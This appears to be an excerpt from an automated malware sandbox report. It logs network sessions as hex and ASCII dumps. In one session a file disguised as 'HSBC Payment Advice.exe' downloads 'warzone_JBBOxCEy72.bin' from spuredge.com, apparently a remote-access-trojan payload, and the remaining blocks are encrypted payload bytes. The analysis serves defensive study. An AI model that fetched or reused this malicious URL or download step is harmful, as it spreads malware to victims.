                  2021-11-25 17:50:49 UTC8INData Raw: 18 24 8d 90 f9 01 a9 0e 03 7b c7 d5 e8 1e ac a1 d9 54 dc c2 ad b3 43 ae 54 51 e4 d2 f6 64 1f ec 2b a7 60 71 6c a1 84 c9 5d 78 39 28 98 9c 4a e9 7d 19 b9 f7 ef eb be a9 07 a6 00 a2 45 a2 89 ea 28 91 56 01 81 c5 7b 06 0d f7 bf e3 cc f4 03 a0 20 10 45 88 a5 8f 56 5d 14 fe fa f6 f9 b5 be 85 a6 77 3e 5c 76 e7 dd 2f 4d 71 56 90 e1 05 20 1d dc eb 59 66 25 40 ba 2a 2b 85 63 60 9c 64 8d 5f ca 58 5a bb 40 ff 47 98 c4 05 28 a1 f0 e2 eb bc 0a ed a8 d3 09 af 9f 43 36 e6 94 fe 4d c5 35 48 d0 16 b9 de 48 e2 93 ce c8 39 2c ee 3d 56 08 8d 63 23 4c e1 86 5f 1f c7 98 1b 97 66 ff 06 91 7f 22 75 cc 53 0f 79 7c ab d2 16 70 50 66 f1 d6 e2 be e0 6d ba fd 03 a6 60 05 8b 94 56 b8 a4 85 ea f6 bd 8d 47 d2 e5 38 12 a2 1b 99 1d 67 d7 77 8f 1a 53 4f a4 2e 7c 31 66 45 a9 43 30 ed 03 2f
                  Data Ascii: ${TCTQd+`ql]x9(J}E(V{ EV]w>\v/MqV Yf%@*+c`d_XZ@G(C6M5HH9,=Vc#L_f"uSy|pPfm`VG8gwSO.|1fEC0/
                  2021-11-25 17:50:49 UTC15INData Raw: 99 f2 58 6a 33 8c c4 86 1e 2e 3b 54 90 ca 81 01 a6 72 e1 b8 d3 5f b5 83 27 a0 19 5b 36 e2 2a f2 b9 f3 60 76 80 71 4c c3 a7 37 3d 50 89 e8 1b 3a 5f f9 fa 5c f2 38 ea dd af 66 98 39 6e 80 2a 51 28 cd a6 76 08 ea cf 16 2a 40 72 f1 78 e2 37 be 4c 0d f3 03 f3 14 9e de 4f 4c e7 b5 f0 a0 0a ed 50 81 11 ca 5f 01 ea 5a 14 d3 d4 3b cf 68 10 b5 3b 16 8e 74 b7 16 ab 63 42 3a fc 77 9d 02 f8 ff 5b 01 60 7c 50 72 ed 03 f8 b1 77 50 95 6c f7 6b 28 ee b5 32 d8 64 90 eb 17 e4 46 2e df 8a ae 1e 72 7b 5a 12 6d c1 17 6e 50 10 30 1f cf 5b 88 41 9b c2 2e 83 54 68 61 5c be 4b 5c 74 70 f6 f6 a2 b8 07 85 c2 0f 7f 6f 8c 99 c2 40 87 1e 8b 77 5b a2 fd db 1c 5d 2b 3e a8 7d 0d e0 38 49 26 a0 aa e7 d3 21 91 db 15 9a 25 04 3d d4 01 c9 ce 85 a0 bf 02 8d ef 67 4f 2a 3e c3 b9 7f 3f 2d 57 6c
                  Data Ascii: Xj3.;Tr_'[6*`vqL7=P:_\8f9n*Q(v*@rx7LOLP_Z;h;tcB:w[`|PrwPlk(2dF.r{ZmnP0[A.Tha\K\tpo@w[]+>}8I&!%=gO*>?-Wl
                  2021-11-25 17:50:49 UTC23INData Raw: 25 1f 2e 3f 82 ef 85 4d 4e 65 0f 29 17 6b 2c 82 29 72 57 88 a3 78 5d c9 c0 c1 8a e1 6e d9 dc c7 43 83 1b 01 86 2b 1a 9f f6 a6 20 94 ea 89 6a 19 ac 12 8f 3e d5 d7 c3 a0 9c f1 09 5b 77 c5 85 cb c8 83 aa 93 b0 b4 a7 88 8d 6c db bc 09 66 8e 5b ea 9a 32 08 00 98 f4 c3 ad 39 88 e9 93 28 4a d8 2c 60 e8 93 23 25 b5 4a 40 c9 c9 ca 6d a0 bd f6 4a 5e 62 ea 19 a4 c0 7c 7a 69 eb 57 ec 26 b6 f5 57 a0 3b 91 49 b9 fe 60 54 5d 79 cf 40 ac 19 56 9c f9 68 73 ef 2f d9 1e 90 9b 61 c3 86 a2 e7 1f 9a 5b 22 5a 34 79 45 8d 36 e1 29 df 6b d4 bb 9d 45 c4 b9 d4 96 cf fc 18 09 fa 8e 75 21 d3 f5 dd fe be ba b7 ab fa b8 8d eb 3d c0 03 64 c1 5a 88 51 71 28 e2 96 11 e6 69 1e b3 9b 62 b8 eb 96 1b 7e 6e 68 48 7f 68 47 05 39 81 2b 5b 06 21 1f ab 8a 90 59 b8 93 f4 99 2d 94 22 da 13 a0 72 3b
                  Data Ascii: %.?MNe)k,)rWx]nC+ j>[wlf[29(J,`#%J@mJ^b|ziW&W;I`T]y@Vhs/a["Z4yE6)kEu!=dZQq(ib~nhHhG9+[!Y-"r;
                  2021-11-25 17:50:49 UTC31INData Raw: 6e 33 0b 73 4e e5 ec 06 70 59 32 e9 fd 22 1f 90 fd 97 72 3a 92 80 8b 52 6d 3f ba d7 62 fa bf 38 ea ee 3d e9 e6 1b 98 bd b4 95 4c 4c 75 e0 03 6b dc 58 9a b6 8b 79 df 2b 46 63 8e 2e b5 be 36 36 ad aa 73 af 32 47 9e 91 b6 53 08 08 d8 bb 10 3c 45 8b e1 f3 67 f8 ba 10 40 93 39 ab f7 e0 f7 ff bd 0b b3 06 d3 cf 7c cc 69 84 b6 a5 cb c8 27 ab c3 02 80 de 44 5f 04 e2 04 3e f0 f9 f9 05 83 c9 50 5a cd e7 dd d9 8c a9 ef 08 11 9b d6 10 ec 8e 33 4a 06 4c 82 b9 a2 9a 05 ac c4 82 a0 d4 fe 2f a9 23 9d 9a 2b fd 4b a9 ac 0b bf d3 a6 b1 20 8c ab 4d 22 03 73 64 35 fe 5c 73 03 cb 1f 84 77 cb 4b 61 a9 29 75 36 fc f8 44 10 b5 c2 74 22 83 2f a8 17 89 4b 19 07 8a 21 56 27 95 2f a3 3a cd 8e 65 37 b4 56 2d 6f 0b ae 49 cc 27 7d aa 21 5b 76 7a c4 67 35 61 0b eb b4 ab 4d 56 79 d2 9b 8a
                  Data Ascii: n3sNpY2"r:Rm?b8=LLukXy+Fc.66s2GS<Eg@9|i'D_>PZ3JL/#+K M"sd5\swKa)u6Dt"/K!V'/:e7V-oI'}![vzg5aMVy
                  2021-11-25 17:50:49 UTC39INData Raw: 70 d7 9c d9 05 cc dc 90 e5 e9 3c 3f fc 42 7e 2d e3 ad 98 07 5d 41 c1 25 28 da 03 27 43 38 24 e3 25 37 66 bc df e5 36 4d 60 12 a2 b9 98 cc 72 b5 ca 27 2f 10 02 9b ac cf f8 34 65 14 8e 93 e2 33 ac e9 cb c9 fa 75 44 bb 47 8f 8c 93 03 3e c1 a9 76 d5 f4 59 41 df 4e a2 02 08 de 71 09 26 8d 3c 0f 56 02 6f 73 ca e3 d4 91 01 91 d8 ed 63 f7 80 bc 86 b1 f4 fe 70 60 89 3a 0b 69 40 2b 78 ae b9 14 17 40 d8 a8 06 93 12 a8 af 37 24 e9 37 a2 a1 26 ad b5 49 09 9b 64 df 00 71 64 8e ac 0a 70 b4 db 45 36 02 73 1f 80 7a e3 f6 26 11 29 d9 ea b2 ac f7 dc c2 98 91 64 45 59 a8 a0 3c b1 9e 5c 66 bd f4 2f 41 b1 e6 9d ea 5c 92 71 db b2 c7 fb 94 8b f2 cc 48 d3 4a fa 64 d8 54 6a 9e 1e 92 8b f2 d1 97 7f c8 b1 39 11 d8 d6 31 84 7b 9a ba ff 72 b0 7f c7 06 bf 81 90 d6 e8 2f 00 b7 fe 5c 6e
                  Data Ascii: p<?B~-]A%('C8$%7f6M`r'/4e3uDG>vYANq&<Voscp`:i@+x@7$7&IdqdpE6sz&)dEY<\f/A\qHJdTj91{r/\n
                  2021-11-25 17:50:49 UTC47INData Raw: a9 11 3b ae 10 c1 e1 ee 66 0c 6a 93 d0 1b 55 b0 fc ec 97 e4 29 ad 95 8c f3 bb 01 b4 26 79 cf ec 5e d8 f8 94 65 40 74 e1 6b b4 ad 5d cd 03 fc 7a f9 56 36 1d 0d 37 eb d7 05 36 d2 24 34 f3 4a 2d 4e 00 8a 7b 6d 9e d6 89 4b 55 00 46 e7 ea 57 51 59 c0 61 fb e6 06 b5 54 c3 a2 c5 1a da 79 8f 51 43 a9 3d fa f9 46 de 0a 6f 7d a2 f2 24 e7 6c 40 6e ae 10 19 a9 83 41 a6 ec 88 75 d8 ae ca 40 0e 17 07 66 ef 6c 7d e6 be fe b7 50 c7 b8 c4 35 24 43 9a de e7 55 29 f9 29 61 89 84 35 0b 6e e6 fb 99 5a f0 f8 08 fd 9f a5 4e 10 dc 6a 4e 5d e7 f9 16 e0 bc f9 07 33 dd 8c cf 29 c2 1c ea 0c 51 d6 be 16 25 8d ef b0 cf 02 f2 f8 38 50 01 9d c5 c8 9b f2 08 67 33 69 85 c5 7c 98 75 db 7d 5a 0a 1b 6e c0 9b c9 24 a9 38 78 d8 b2 11 08 90 89 b7 dd 2f 09 71 06 f2 1e fa 40 58 ff 16 c8 b2 9b bf
                  Data Ascii: ;fjU)&y^e@tk]zV676$4J-N{mKUFWQYaTyQC=Fo}$l@nAu@fl}P5$CU))a5nZNjN]3)Q%8Pg3i|u}Zn$8x/q@X
                  2021-11-25 17:50:49 UTC55INData Raw: d8 23 21 e6 c8 b7 07 48 af 42 10 c7 c5 fd 0e e6 6a 54 7c d6 8b e1 a9 6e 62 c8 f4 91 6d bd 4e 5c 73 a0 69 73 1c 2c 13 2b 18 3f 12 a0 26 6e 16 4c 51 51 1e 52 50 44 62 75 a7 16 ad 1b 14 ee ca 27 9d b5 8d 1c 27 c2 d3 0b 2f 2c 3b 82 d2 c6 2d ed a3 ee d7 b1 e8 dc 6c 27 90 54 60 e5 8f 33 98 d8 e9 73 af 06 a0 b5 89 1b 9f 53 af 36 0c 7d 0a 39 79 4d 9e 89 79 2b 41 23 94 4f a9 29 a0 d9 7c 1e f1 50 66 ff 60 6f 1f a2 f0 28 7b fd f7 cf f7 a0 fa 87 7c c4 1f d3 de 4b ed 16 5e a6 19 fd 9e f4 ea cb f5 9d e0 a7 4c 08 ac 6d 5a 44 51 91 99 bc d6 23 76 2d dd ae 05 4b 24 4d c9 9b 68 6f 27 41 56 54 78 f0 e8 f9 9f f5 99 aa c6 13 86 e6 62 ba 1e 96 b7 10 3b cf 89 26 b6 8a de f2 53 46 cb 72 06 2c 7b 8c 18 7d 6c c3 d1 3d 98 19 e5 59 49 5d e4 91 90 c7 2f 46 b8 97 1b c0 da 1e 72 01 b9
                  Data Ascii: #!HBjT|nbmN\sis,+?&nLQQRPDbu''/,;-l'T`3sS6}9yMy+A#O)|Pf`o({|K^LmZDQ#v-K$Mho'AVTxb;&SFr,{}l=YI]/Fr
                  2021-11-25 17:50:49 UTC62INData Raw: d6 64 26 ca a3 a0 0d 5a 8f b2 ae 27 8c c5 05 8f c3 b0 fa d8 55 05 52 22 07 f6 e3 64 47 f7 06 db a3 e6 87 b3 e1 48 30 35 85 64 28 c6 69 fb c3 27 37 6c ce 0e 03 61 27 91 5c ea 46 52 d7 16 a6 e4 5f 79 da 3d b1 b1 58 39 ce 49 79 74 b6 82 f1 6e 79 89 85 48 0f fb 85 db e4 21 88 d3 6b f9 f2 15 71 6e 14 7e 2d 73 6f d2 49 a5 f3 a7 ce 29 da 4b 0e e8 f6 0c b3 da b8 33 8d 7f c9 f8 12 43 3b cf 64 33 fc d0 fe 46 a9 c4 79 6c 74 da 6e e5 53 1b bf 14 eb ae 84 53 e0 ef b1 6e 3b 6e 67 1b 88 a7 ff b0 2c f4 c1 b0 44 be a7 dc fd f3 31 12 6e f4 42 e4 f1 d2 b3 b3 cc d6 2a 6c 06 c8 1b 6e eb ee 40 f4 7d 81 1e ab 28 7c 29 7b 28 6c 22 8b f8 32 81 f0 ea 44 14 cf 9f 67 c4 40 b6 ba bd cd d2 09 3c ee 7a cf ea dc e4 e1 66 6d e2 30 e4 76 ca 6e b6 91 6f 7b 5e f4 0d f5 88 84 5c bb c6 a2 63
                  Data Ascii: d&Z'UR"dGH05d(i'7la'\FR_y=X9IytnyH!kqn~-soI)K3C;d3FyltnSSn;ng,D1nB*ln@}(|){(l"2Dg@<zfm0vno{^\c
                  2021-11-25 17:50:49 UTC70INData Raw: ac 93 bf 10 a1 c4 c7 3e 3e de 2c e5 95 a7 82 60 9c f8 2c 83 ef 10 c7 af 04 0f 38 d3 ff 9c 81 bb 82 4e 7f ab 91 33 10 1f 24 6c c0 cc e4 49 eb e3 72 aa 25 e5 93 88 e9 83 c4 e4 b9 65 5c 8d 84 0d f3 84 1e fe c5 ab 92 1e 62 57 2a c2 73 99 3c 84 87 5c 8a 76 5b ac 74 3f 71 f1 b4 dc 3d e6 20 98 b4 ca 22 5f 18 ea 03 dd 3a 25 29 4c 6a e4 33 51 7d 47 37 83 6b 7e 45 67 dd a4 4b 3a e8 4c b5 f6 62 95 7b b2 2c 7b 3e 66 eb bc 65 4a 26 46 c9 ad 3f 6f 94 2e fd 20 90 31 4b ee e2 ed 69 3e 6a 03 1e a9 ff c0 29 ad dd 12 25 19 08 2a 32 94 7f 12 ca 88 8a 1d 17 85 22 bb c4 b1 00 7d 54 cf 5d f9 f0 1c dc 49 e6 87 65 f9 56 04 80 13 41 7f 5f 15 3d c2 5e 2b 38 9d 48 36 73 28 12 f4 5c 26 57 4b 9c 5d 9f 31 78 c8 85 5f 8b 22 a4 41 f5 41 d1 22 72 e8 cf fc a6 d7 98 9a cb 86 ab 28 f2 9d c1
                  Data Ascii: >>,`,8N3$lIr%e\bW*s<\v[t?q= "_:%)Lj3Q}G7k~EgK:Lb{,{>feJ&F?o. 1Ki>j)%*2"}T]IeVA_=^+8H6s(\&WK]1x_"AA"r(
                  2021-11-25 17:50:49 UTC78INData Raw: 26 9c df 06 0a a1 67 e4 0d 1d d7 87 c2 e5 38 80 fe f4 02 9e ef 1b 0c 17 7a 66 aa 22 23 db 32 eb 0d 2b a4 ad 62 4d 79 60 8d 79 dd 9e 54 14 0e 35 6f 31 bf 69 bf 73 07 76 22 2f 7e d2 2a 84 0d d0 e8 ff 43 f0 bf 6a 63 27 54 1b eb 37 b0 16 e1 c1 84 d1 6d 37 c2 41 e9 d6 4e a5 c7 7d b7 9a c7 44 ee 0c 61 5c a1 76 11 c5 26 be 66 0a 38 f4 61 39 6c a5 21 fd 85 1f 51 e3 e2 7f d5 e4 82 6b c6 cb 30 3b 9e 6b eb 39 da aa 41 cc 4f 92 01 71 46 38 58 a0 2d e0 d5 7d de 9e b8 0b 2c 5b 20 5f 35 0a dd a5 e7 fa cf 6e 7f 1c 57 c9 ae 70 04 09 70 eb 25 30 f2 d0 9f 1a 50 91 84 22 f0 ee 59 75 36 94 12 84 20 a9 76 d1 cf b4 12 e9 a5 7b 80 ff 10 6a d9 54 06 ff c7 f2 a2 bb 82 89 b0 46 b9 95 b3 e5 41 d7 bb d5 ac 95 df c8 da b9 69 b2 3c c3 cd 96 d8 3b 73 9e b5 03 2b 50 55 15 b6 72 ae 65 d6
                  Data Ascii: &g8zf"#2+bMy`yT5o1isv"/~*Cjc'T7m7AN}Da\v&f8a9l!Qk0;k9AOqF8X-},[ _5nWpp%0P"Yu6 v{jTFAi<;s+PUre
                  2021-11-25 17:50:49 UTC86INData Raw: f9 b4 c9 d9 86 12 23 04 4f a8 63 36 03 05 57 59 de d3 11 bf 75 03 8c 18 ff 3b b9 8d 89 36 dd 25 c7 a5 0d 72 56 e0 66 c9 ef 2e ce 07 68 06 a2 56 5f 62 81 85 6e 71 50 8e cd e5 aa b8 de e9 96 ba 71 20 c6 c3 bb a3 61 53 27 71 72 32 25 16 db 2b 78 64 b6 e0 36 74 97 43 e4 59 e3 05 98 56 ef c2 31 07 ca 09 db ab 9d 38 10 47 5e f8 b7 46 98 9d ce 8b 8b a0 b9 37 05 73 50 1e bb 50 8c 27 3c 97 8a a6 f2 9f fb 1c 5a 12 38 70 dc ed 61 a2 2b 5c 46 08 f4 59 3a aa ae 1e ff 7c 41 bc 5c d3 7f ba fb 49 8b 4f 7d 65 2a 2c 85 3b 5a 28 d9 c5 aa 43 60 ab e5 1d b4 78 3d c8 b3 f1 03 10 e0 91 e7 51 e6 7e e7 28 74 19 3c 50 14 31 cc f0 44 a0 27 e7 28 64 20 7a 45 a9 36 7f 0b 70 f5 e9 40 e2 b0 d7 11 2f 30 c5 b7 8c 44 92 99 cd 41 a5 d2 bc fc 6e 77 6e 3e ec f3 32 0f f9 39 2b 61 a5 2e f4 62
                  Data Ascii: #Oc6WYu;6%rVf.hV_bnqPq aS'qr2%+xd6tCYV18G^F7sPP'<Z8pa+\FY:|A\IO}e*,;Z(C`x=Q~(t<P1D'(d zE6p@/0DAnwn>29+a.b
                  2021-11-25 17:50:49 UTC94INData Raw: dc cb cb a9 51 75 3b 28 fa 24 25 b8 91 dd a7 e1 8d e6 9f 40 82 8c 98 4b 6b 8c 01 b5 37 ff 8e e3 ca a3 22 02 4d e3 d4 b2 b0 8a 8f 0b 75 9a d8 ab 5c ad 33 75 99 d8 a4 cd 35 aa b5 09 8c 7d 2e 2d 95 4e 0e d1 75 e2 ae f6 0f 39 61 02 0a f1 08 52 39 8a 41 70 70 01 0d 9c c1 d9 eb 66 da 04 c5 f1 99 31 ad 8e 9b 2e bf e8 35 83 8f 80 11 5d ce ee f3 bf 3c 1b 6c 25 5f e2 62 72 d2 8d e5 da 5b 85 77 1d 50 b3 04 c7 6c e5 8b ea 51 13 23 6b 26 e2 48 bd 47 2f d2 4b ec 76 eb 55 33 b9 d4 41 c9 d5 d2 6f ea 7b 3e 87 bc 2a 96 bd f0 ca e5 61 62 56 ec 66 05 d4 d1 32 fd e9 1f 0a 3a 0e 60 20 bb 46 17 3b 37 b5 e4 d9 bd 36 9a 05 72 cb 72 53 2f df 07 64 da 0b 18 59 2e 64 63 93 81 19 dd 6d f0 18 27 f8 b3 af a4 c8 be 64 a6 79 fe 9d 9e c7 5a bd 34 fb 37 06 18 83 3f 15 b9 dc 18 d9 84 71 87
                  Data Ascii: Qu;($%@Kk7"Mu\3u5}.-Nu9aR9Appf1.5]<l%_br[wPlQ#k&HG/KvU3Ao{>*abVf2:` F;76rrS/dY.dcm'dyZ47?q
                  2021-11-25 17:50:49 UTC101INData Raw: 10 b7 3a a8 1f 80 f8 23 64 21 6d 20 2a f3 30 db 66 15 d5 25 a9 0e 8e 36 13 3d d6 82 ac a1 86 24 ee 6f 0f 92 a9 66 e2 bd f0 81 a0 b7 0c 13 a0 59 37 fa b5 70 a1 d9 7c 5f 5e 79 13 c0 e9 2f 79 af 55 e2 e4 c5 cc 25 88 01 61 a2 1c 57 6c 9e 07 3b db 4c 7d 03 0b 69 6c 83 8f 4a f3 72 f2 08 12 9f b3 82 a5 e3 fd 10 e0 46 8c f8 f9 9b 5c ac 3b eb 01 4b 44 e7 50 62 b9 25 3f 9e e1 11 cb 15 23 d0 24 40 05 34 50 f6 49 0e af 36 74 7f a1 5f ca 8b d7 f6 b0 39 4e e8 a5 71 19 0e 0f 0a 53 9f 0a b9 02 9e f9 07 a4 57 36 c8 a2 c4 77 78 97 39 6d fa 3a 32 64 b1 f5 99 43 cb a7 37 6c f3 a0 61 60 4a 1a 09 12 5d 2f c7 15 26 68 8e 79 fb f3 0c d2 99 c0 de 4a 89 b7 67 82 8e c2 b7 99 20 f5 1a 00 d5 a1 ff c6 03 a6 9f 72 ff 59 1b 6c 4c 6f e5 f6 93 af bf 6b 6e 7c 01 90 1b 14 50 b3 ef e9 80 1a
                  Data Ascii: :#d!m *0f%6=$ofY7p|_^y/yU%aWl;L}ilJrF\;KDPb%?#$@4PI6t_9NqSW6wx9m:2dC7la`J]/&hyJg rYlLokn|P
                  2021-11-25 17:50:49 UTC109INData Raw: 59 56 0c 10 45 c6 90 ec 4b 4f b8 ae f5 0f d7 f6 30 17 27 c8 c5 05 78 9b 09 ac 60 93 3f 9f 10 e3 cc d5 93 f4 03 4f fe b8 20 12 c0 38 6d d1 0c 0f 52 fa f3 c6 75 b3 91 4f 5a 34 f2 f2 22 33 2d 20 25 7a 28 51 22 c9 50 3d 4e 17 a6 b7 96 db f8 96 72 e4 cf e3 ba 68 fa 2c a1 af bf c0 4a 01 bd 2b cf e8 9e 67 4a 8b 20 0e 55 62 44 d1 cf 83 e4 87 20 6e 61 41 9b 6c 2d 2e 8a b7 f6 18 23 f0 fd fa e4 d2 c2 22 79 c2 91 81 39 b2 ea a6 2a 9c 75 6d 5a 81 27 fa 54 ee ca 29 a5 3a bc af cd 01 d5 59 d1 c5 21 24 ab ec a7 7c fe bc fc 89 d4 ab 46 97 a1 28 23 06 7c 3c 23 e2 88 7a 1f 51 e5 d8 ea 4e d5 a8 80 03 5d de 82 ef 71 81 bc ab 97 86 7b 35 32 d8 db b6 bf 95 5a a2 b4 9f aa 44 b5 8d 12 9e 0e cc 0c fd fc 15 cb 07 d5 a5 b6 7b 9d 0b db 80 54 a0 e6 ab f2 2c d5 31 ac b1 7d 4a bc e1 43
                  Data Ascii: YVEKO0'x`?O 8mRuOZ4"3- %z(Q"P=Nrh,J+gJ UbD naAl-.#"y9*umZ'T):Y!$|F(#|<#zQN]q{52ZD{T,1}JC


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.74982338.103.244.107443C:\Users\user\Desktop\HSBC Payment Advice.exe
                  TimestampkBytes transferredDirectionData
                  2021-11-25 17:53:00 UTC113OUTGET /warzone_JBBOxCEy72.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: spuredge.com
                  Cache-Control: no-cache
                  2021-11-25 17:53:00 UTC113INHTTP/1.1 200 OK
                  Date: Thu, 25 Nov 2021 17:53:00 GMT
                  Server: Apache
                  Last-Modified: Wed, 24 Nov 2021 19:03:36 GMT
                  Accept-Ranges: bytes
                  Content-Length: 115776
                  Connection: close
                  Content-Type: application/octet-stream
                  2021-11-25 17:53:00 UTC113INData Raw: 90 31 03 cf 80 65 33 6d 2e 69 a8 c3 32 17 22 69 13 1a de 7d b9 21 57 15 22 1f c1 fc 9e a6 32 19 7d 1e 80 92 3d 5f 34 88 f4 ac 46 9c 83 cc 5a 2d ab 30 bc 7f fb 4f d1 99 0f 64 1d b8 84 a2 d3 52 10 94 eb f0 ec 4e 74 0f 44 2c 91 51 bf 6b e4 97 11 2f 85 77 8a 53 e3 76 e8 0f 80 f8 99 62 21 6d 0e 5e 96 48 af 42 78 bb 25 a9 0e 8e 36 33 3d d6 06 ac a1 86 0a 87 0b 6e e6 c8 42 d7 bd f1 81 a0 3d 33 a9 ae 55 83 f3 78 7f 29 e8 53 f4 18 2d 7b 39 ba 0f 09 3d 3e 85 96 8a d3 61 8a 14 6e cc 73 53 69 fc 62 e7 a9 39 13 0d 10 63 2d b3 a1 3d a9 65 e7 08 15 d6 be 8f af ab db 10 e0 16 8c f8 f9 cf 68 34 8f a1 5c fd f0 d9 6c f0 3f a7 25 0c 67 f8 f8 d8 a5 c1 71 b6 e2 77 75 c4 fc 31 93 a4 f2 52 b4 90 4c 33 eb 64 36 0e dd 73 42 3a 44 b8 bd 13 a9 63 8c d0 19 0c 7f 7c 96 ca b0 d9 f7 32
                  Data Ascii: 1e3m.i2"i}!W"2}=_4FZ-0OdRNtD,Qk/wSvb!m^HBx%63=nB=3Ux)S-{9=>ansSib9c-=eh4\l?%gqwu1RL3d6sB:Dc|2
                  2021-11-25 17:53:00 UTC121INData Raw: 18 24 8d 90 f9 01 a9 0e 03 7b c7 d5 e8 1e ac a1 d9 54 dc c2 ad b3 43 ae 54 51 e4 d2 f6 64 1f ec 2b a7 60 71 6c a1 84 c9 5d 78 39 28 98 9c 4a e9 7d 19 b9 f7 ef eb be a9 07 a6 00 a2 45 a2 89 ea 28 91 56 01 81 c5 7b 06 0d f7 bf e3 cc f4 03 a0 20 10 45 88 a5 8f 56 5d 14 fe fa f6 f9 b5 be 85 a6 77 3e 5c 76 e7 dd 2f 4d 71 56 90 e1 05 20 1d dc eb 59 66 25 40 ba 2a 2b 85 63 60 9c 64 8d 5f ca 58 5a bb 40 ff 47 98 c4 05 28 a1 f0 e2 eb bc 0a ed a8 d3 09 af 9f 43 36 e6 94 fe 4d c5 35 48 d0 16 b9 de 48 e2 93 ce c8 39 2c ee 3d 56 08 8d 63 23 4c e1 86 5f 1f c7 98 1b 97 66 ff 06 91 7f 22 75 cc 53 0f 79 7c ab d2 16 70 50 66 f1 d6 e2 be e0 6d ba fd 03 a6 60 05 8b 94 56 b8 a4 85 ea f6 bd 8d 47 d2 e5 38 12 a2 1b 99 1d 67 d7 77 8f 1a 53 4f a4 2e 7c 31 66 45 a9 43 30 ed 03 2f
                  Data Ascii: ${TCTQd+`ql]x9(J}E(V{ EV]w>\v/MqV Yf%@*+c`d_XZ@G(C6M5HH9,=Vc#L_f"uSy|pPfm`VG8gwSO.|1fEC0/
                  2021-11-25 17:53:00 UTC129INData Raw: 99 f2 58 6a 33 8c c4 86 1e 2e 3b 54 90 ca 81 01 a6 72 e1 b8 d3 5f b5 83 27 a0 19 5b 36 e2 2a f2 b9 f3 60 76 80 71 4c c3 a7 37 3d 50 89 e8 1b 3a 5f f9 fa 5c f2 38 ea dd af 66 98 39 6e 80 2a 51 28 cd a6 76 08 ea cf 16 2a 40 72 f1 78 e2 37 be 4c 0d f3 03 f3 14 9e de 4f 4c e7 b5 f0 a0 0a ed 50 81 11 ca 5f 01 ea 5a 14 d3 d4 3b cf 68 10 b5 3b 16 8e 74 b7 16 ab 63 42 3a fc 77 9d 02 f8 ff 5b 01 60 7c 50 72 ed 03 f8 b1 77 50 95 6c f7 6b 28 ee b5 32 d8 64 90 eb 17 e4 46 2e df 8a ae 1e 72 7b 5a 12 6d c1 17 6e 50 10 30 1f cf 5b 88 41 9b c2 2e 83 54 68 61 5c be 4b 5c 74 70 f6 f6 a2 b8 07 85 c2 0f 7f 6f 8c 99 c2 40 87 1e 8b 77 5b a2 fd db 1c 5d 2b 3e a8 7d 0d e0 38 49 26 a0 aa e7 d3 21 91 db 15 9a 25 04 3d d4 01 c9 ce 85 a0 bf 02 8d ef 67 4f 2a 3e c3 b9 7f 3f 2d 57 6c
                  Data Ascii: Xj3.;Tr_'[6*`vqL7=P:_\8f9n*Q(v*@rx7LOLP_Z;h;tcB:w[`|PrwPlk(2dF.r{ZmnP0[A.Tha\K\tpo@w[]+>}8I&!%=gO*>?-Wl
                  2021-11-25 17:53:00 UTC137INData Raw: 25 1f 2e 3f 82 ef 85 4d 4e 65 0f 29 17 6b 2c 82 29 72 57 88 a3 78 5d c9 c0 c1 8a e1 6e d9 dc c7 43 83 1b 01 86 2b 1a 9f f6 a6 20 94 ea 89 6a 19 ac 12 8f 3e d5 d7 c3 a0 9c f1 09 5b 77 c5 85 cb c8 83 aa 93 b0 b4 a7 88 8d 6c db bc 09 66 8e 5b ea 9a 32 08 00 98 f4 c3 ad 39 88 e9 93 28 4a d8 2c 60 e8 93 23 25 b5 4a 40 c9 c9 ca 6d a0 bd f6 4a 5e 62 ea 19 a4 c0 7c 7a 69 eb 57 ec 26 b6 f5 57 a0 3b 91 49 b9 fe 60 54 5d 79 cf 40 ac 19 56 9c f9 68 73 ef 2f d9 1e 90 9b 61 c3 86 a2 e7 1f 9a 5b 22 5a 34 79 45 8d 36 e1 29 df 6b d4 bb 9d 45 c4 b9 d4 96 cf fc 18 09 fa 8e 75 21 d3 f5 dd fe be ba b7 ab fa b8 8d eb 3d c0 03 64 c1 5a 88 51 71 28 e2 96 11 e6 69 1e b3 9b 62 b8 eb 96 1b 7e 6e 68 48 7f 68 47 05 39 81 2b 5b 06 21 1f ab 8a 90 59 b8 93 f4 99 2d 94 22 da 13 a0 72 3b
                  Data Ascii: %.?MNe)k,)rWx]nC+ j>[wlf[29(J,`#%J@mJ^b|ziW&W;I`T]y@Vhs/a["Z4yE6)kEu!=dZQq(ib~nhHhG9+[!Y-"r;
                  2021-11-25 17:53:01 UTC145INData Raw: 6e 33 0b 73 4e e5 ec 06 70 59 32 e9 fd 22 1f 90 fd 97 72 3a 92 80 8b 52 6d 3f ba d7 62 fa bf 38 ea ee 3d e9 e6 1b 98 bd b4 95 4c 4c 75 e0 03 6b dc 58 9a b6 8b 79 df 2b 46 63 8e 2e b5 be 36 36 ad aa 73 af 32 47 9e 91 b6 53 08 08 d8 bb 10 3c 45 8b e1 f3 67 f8 ba 10 40 93 39 ab f7 e0 f7 ff bd 0b b3 06 d3 cf 7c cc 69 84 b6 a5 cb c8 27 ab c3 02 80 de 44 5f 04 e2 04 3e f0 f9 f9 05 83 c9 50 5a cd e7 dd d9 8c a9 ef 08 11 9b d6 10 ec 8e 33 4a 06 4c 82 b9 a2 9a 05 ac c4 82 a0 d4 fe 2f a9 23 9d 9a 2b fd 4b a9 ac 0b bf d3 a6 b1 20 8c ab 4d 22 03 73 64 35 fe 5c 73 03 cb 1f 84 77 cb 4b 61 a9 29 75 36 fc f8 44 10 b5 c2 74 22 83 2f a8 17 89 4b 19 07 8a 21 56 27 95 2f a3 3a cd 8e 65 37 b4 56 2d 6f 0b ae 49 cc 27 7d aa 21 5b 76 7a c4 67 35 61 0b eb b4 ab 4d 56 79 d2 9b 8a
                  Data Ascii: n3sNpY2"r:Rm?b8=LLukXy+Fc.66s2GS<Eg@9|i'D_>PZ3JL/#+K M"sd5\swKa)u6Dt"/K!V'/:e7V-oI'}![vzg5aMVy
